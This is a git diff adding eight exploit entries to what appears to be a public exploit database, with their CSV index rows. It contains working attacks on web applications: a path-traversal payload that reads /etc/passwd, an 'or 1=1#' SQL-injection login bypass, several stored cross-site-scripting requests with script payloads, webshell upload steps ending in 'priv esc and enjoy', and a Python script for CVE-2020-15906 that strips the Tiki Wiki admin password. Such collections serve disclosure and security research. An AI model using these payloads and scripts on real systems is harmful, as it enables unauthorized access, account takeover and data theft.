diff --git a/exploits/php/webapps/48920.txt b/exploits/php/webapps/48920.txt
new file mode 100644
index 000000000..5c233471c
--- /dev/null
+++ b/exploits/php/webapps/48920.txt
@@ -0,0 +1,15 @@
+# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
+# Date: 10/21/2020
+# Exploit Author: Sosecure
+# Vendor Homepage: https://hrsale.com/index.php
+# Version: version 2.0.0
+
+Description:
+This exploit allow you to download any readable file from server with out permission and login session.
+
+Payload :
+ https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
+POC:
+
+ 1. Access to HRsale application and browse to download path with payload
+ 2. Get /etc/passwd
\ No newline at end of file
diff --git a/exploits/php/webapps/48921.txt b/exploits/php/webapps/48921.txt
new file mode 100644
index 000000000..06c34fcda
--- /dev/null
+++ b/exploits/php/webapps/48921.txt
@@ -0,0 +1,43 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - Stored Cross Site Scripting
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
+
+Step 2: use payload in Course and Description field
+
+Malicious Request
+
+POST /schoolFSS/scheduling/admin/ajax.php?action=save_course HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------168636252127671582243354784793
+Content-Length: 478
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/index.php?page=courses
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="id"
+
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="course"
+
+
+-----------------------------168636252127671582243354784793
+Content-Disposition: form-data; name="description"
+
+
+-----------------------------168636252127671582243354784793--
+
+Step 3: Cookie will be reflected each time someone visits the Course List section.
\ No newline at end of file
diff --git a/exploits/php/webapps/48922.txt b/exploits/php/webapps/48922.txt
new file mode 100644
index 000000000..37ac58d4b
--- /dev/null
+++ b/exploits/php/webapps/48922.txt
@@ -0,0 +1,31 @@
+# Exploit Title: School Faculty Scheduling System 1.0 - Authentication Bypass
+# Date: 21/10/2020
+# Exploit Author: Jyotsna Adhana
+# Vendor Homepage: https://www.sourcecodester.com/php/14535/school-faculty-scheduling-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14535&title=School+Faculty+Scheduling+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+Step 1: Open the URL http://localhost/schoolFSS/scheduling/admin
+
+Step 2: use payload jyot' or 1=1# in user and password field
+
+Malicious Request
+
+POST /schoolFSS/scheduling/admin/ajax.php?action=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/schoolFSS/scheduling/admin/login.php
+Cookie: PHPSESSID=7lojvad06l803amt3f7hp7o8re
+
+username=jyot'+or+1%3D1+%23&password=jyot'+or+1%3D1+%23
+
+Step 3: You will be logged in as admin.
\ No newline at end of file
diff --git a/exploits/php/webapps/48923.txt b/exploits/php/webapps/48923.txt
new file mode 100644
index 000000000..44f1fc50a
--- /dev/null
+++ b/exploits/php/webapps/48923.txt
@@ -0,0 +1,17 @@
+# Exploit Title: GOautodial 4.0 - Authenticated Shell Upload
+# Author: Balzabu
+# Discovery Date: 07-23-2020
+# Vendor Homepage: https://goautodial.org/
+# Software Link: https://goautodial.org/GOautodial-4-x86_64-Final-20191010-0150.iso.html
+# Tested Version: 4.0 (Last relase as of today)
+# Tested on OS: CentOS 7
+
+# STEPS TO REPRODUCE:
+
+1 - Log in as an agent
+2 - Write a new message to user goadmin with random subject and text
+3 - Attach your webshell to the message
+4 - Access your shell at
+https://www.foo.com/uploads/year/month/shellname.php ( Example:
+https://XXX.XXX.XXX.XXX/uploads/2020/07/shell.php )
+5 - Priv esc and enjoy ... :-)
\ No newline at end of file
diff --git a/exploits/php/webapps/48924.txt b/exploits/php/webapps/48924.txt
new file mode 100644
index 000000000..3b75d932c
--- /dev/null
+++ b/exploits/php/webapps/48924.txt
@@ -0,0 +1,85 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Product Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Product Name' parameter in the Edit Product function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Product Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Product"
+
+ 3. Click "Action" in any categories name row
+
+ 4. Click Edit, then Product Info (tab)
+
+ 5. In "Product Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Product Name' will trigger the XSS.
+
+
+
+POST /stock/php_action/editProduct.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/product.php
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=---------------------------147762840819880874581057152477
+Content-Length: 938
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editProductName"
+
+
+
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editQuantity"
+
+
+9
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editRate"
+
+
+
+1200
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editBrandName"
+
+
+12
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editCategoryName"
+
+
+
+7
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="editProductStatus"
+
+
+
+1
+-----------------------------147762840819880874581057152477
+Content-Disposition: form-data; name="productId"
+
+
+8
+-----------------------------147762840819880874581057152477--
\ No newline at end of file
diff --git a/exploits/php/webapps/48925.txt b/exploits/php/webapps/48925.txt
new file mode 100644
index 000000000..adb213327
--- /dev/null
+++ b/exploits/php/webapps/48925.txt
@@ -0,0 +1,47 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Categories Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Categories Name' parameter in the edit brand function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Categories Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Category"
+
+ 3. Click "Action" in any categories name row
+
+ 4. Click Edit
+
+ 5. In "Categories Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Categories Name' will trigger the XSS.
+
+POST /stock/php_action/editCategories.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/categories.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 102
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+
+
+
+editCategoriesName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editCategoriesStatus=1&editCategoriesId=9
\ No newline at end of file
diff --git a/exploits/php/webapps/48926.txt b/exploits/php/webapps/48926.txt
new file mode 100644
index 000000000..4e45f1f03
--- /dev/null
+++ b/exploits/php/webapps/48926.txt
@@ -0,0 +1,44 @@
+# Exploit Title: Stock Management System 1.0 - Persistent Cross-Site Scripting (Brand Name)
+# Exploit Author: Adeeb Shah (@hyd3sec)
+# Date: August 2, 2020
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14366/stock-management-system-php.html
+# Version: 1.0
+# Tested On: Windows 10 (x64_86) + XAMPP 7.4.4
+
+
+# Vulnerability Details
+# Description A persistent cross-site scripting vulnerability exists within the 'Brand Name' parameter in the edit brand function.
+# This example allows a logged-in user to inject javascript code as a persistent XSS attack which is persistent on any page with the Brand Name value expected.
+
+#Steps:
+
+ 1. Log in with admin privileges (use credentials or use the Auth Login Bypass exploit)
+
+ 2. Click "Brand"
+
+ 3. Click "Action" in any brand name row
+
+ 4. Click Edit
+
+ 5. In "Brand Name" field enter XSS
+
+ 6. Click save changes
+
+ 7. Any page on the webapp expecting that 'Brand Name' will trigger the XSS.
+
+POST /stock/php_action/editBrand.php HTTP/1.1
+Host: 192.168.222.132
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.222.132/stock/brand.php
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 78
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=1halobmiaq86oi70ogliu0qlh8
+
+editBrandName=%3Cscript%3Ealert(%22hyd3sec%22)%3C%2Fscript%3E&editBrandStatus=1&brandId=14
\ No newline at end of file
diff --git a/exploits/php/webapps/48927.py b/exploits/php/webapps/48927.py
new file mode 100755
index 000000000..64ec94583
--- /dev/null
+++ b/exploits/php/webapps/48927.py
@@ -0,0 +1,90 @@
+# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
+# Date: 01.08.2020 (1st August 2020)
+# Exploit Author: Maximilian Barz aka. Silky
+# Vendor Homepage: tiki.org
+# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
+# Version: 21.1
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+
+#!/usr/bin/env/python3
+import requests
+import json
+import lxml.html
+import sys
+
+banner = '''
+
+████████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██████ ██ ██
+ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ███ ███
+ ██ ██ █████ ██ ██ █ ██ ██ █████ ██ █████ ██ ██
+ ██ ██ ██ ██ ██ ██ ███ ██ ██ ██ ██ ██ ██ ██ ██
+ ██ ██ ██ ██ ██ ███ ███ ██ ██ ██ ██ ███████ ██ ██ ██
+
+
+ █████ ██ ██ ████████ ██ ██ ███████ ███ ██ ████████ ██ ██████ █████ ████████ ██ ██████ ███ ██ ██████ ██ ██ ██████ █████ ███████ ███████
+██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+███████ ██ ██ ██ ███████ █████ ██ ██ ██ ██ ██ ██ ███████ ██ ██ ██ ██ ██ ██ ██ ██████ ████ ██████ ███████ ███████ ███████
+██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
+██ ██ ██████ ██ ██ ██ ███████ ██ ████ ██ ██ ██████ ██ ██ ██ ██ ██████ ██ ████ ██████ ██ ██ ██ ██ ███████ ███████
+
+Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
+'''
+
+
+
+
+def main():
+ if(len(sys.argv) < 2):
+ print(banner)
+ print("Usage: %s " % sys.argv[0])
+ print("Eg: %s 1.2.3.4 " % sys.argv[0])
+ return
+
+
+ rhost = sys.argv[1]
+ url = "http://"+rhost+"/tiki/tiki-login.php"
+
+ session = requests.Session()
+
+ def get_ticket():
+ r = requests.get(url)
+ login_page = r.text.encode('utf-8')
+ html = lxml.html.fromstring(login_page)
+ auth = html.xpath('//input[@name="ticket"]/@value')
+
+ return str(auth)[2:-2]
+
+ def get_cookie():
+ session.get(url)
+ return session.cookies.get_dict()
+
+
+ cookie = get_cookie()
+ ticket = get_ticket()
+
+ payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
+ headers = {
+ 'Host': rhost,
+ 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+ 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzrhost, deflate',
+ 'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
+ 'Content-Type': 'application/x-www-form-urlencoded',
+ 'Content-Length': '125',
+ 'Connection': 'close',
+ 'Upgrade-Insecure-Requests': '1',
+ 'Cache-Control': 'max-age=0',
+ }
+
+
+ for i in range(60):
+ r = session.post(url, payload, headers)
+ if("Account requires administrator approval." in r.text):
+ print("Admin Password got removed.")
+ print("Use BurpSuite to login into admin without a password ")
+
+
+
+if(__name__ == '__main__'):
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ba10c71d9..ab5e87ad1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -40738,6 +40738,14 @@ id,file,description,date,author,type,platform,port
48917,exploits/java/webapps/48917.py,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution",2020-10-20,"Jonatas Fil",webapps,java,
48918,exploits/php/webapps/48918.sh,"WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection",2020-10-20,"Jonatas Fil",webapps,php,
48919,exploits/multiple/webapps/48919.txt,"WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)",2020-10-20,n1x_,webapps,multiple,
+48920,exploits/php/webapps/48920.txt,"Hrsale 2.0.0 - Local File Inclusion",2020-10-21,Sosecure,webapps,php,
+48921,exploits/php/webapps/48921.txt,"School Faculty Scheduling System 1.0 - Stored Cross Site Scripting POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48922,exploits/php/webapps/48922.txt,"School Faculty Scheduling System 1.0 - Authentication Bypass POC",2020-10-21,"Jyotsna Adhana",webapps,php,
+48923,exploits/php/webapps/48923.txt,"GOautodial 4.0 - Authenticated Shell Upload",2020-10-21,Balzabu,webapps,php,
+48924,exploits/php/webapps/48924.txt,"Stock Management System 1.0 - 'Product Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48925,exploits/php/webapps/48925.txt,"Stock Management System 1.0 - 'Categories Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48926,exploits/php/webapps/48926.txt,"Stock Management System 1.0 - 'Brand Name' Persistent Cross-Site Scripting",2020-10-21,"Adeeb Shah",webapps,php,
+48927,exploits/php/webapps/48927.py,"Tiki Wiki CMS Groupware 21.1 - Authentication Bypass",2020-10-21,"Maximilian Barz",webapps,php,
42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple,
42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php,
42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,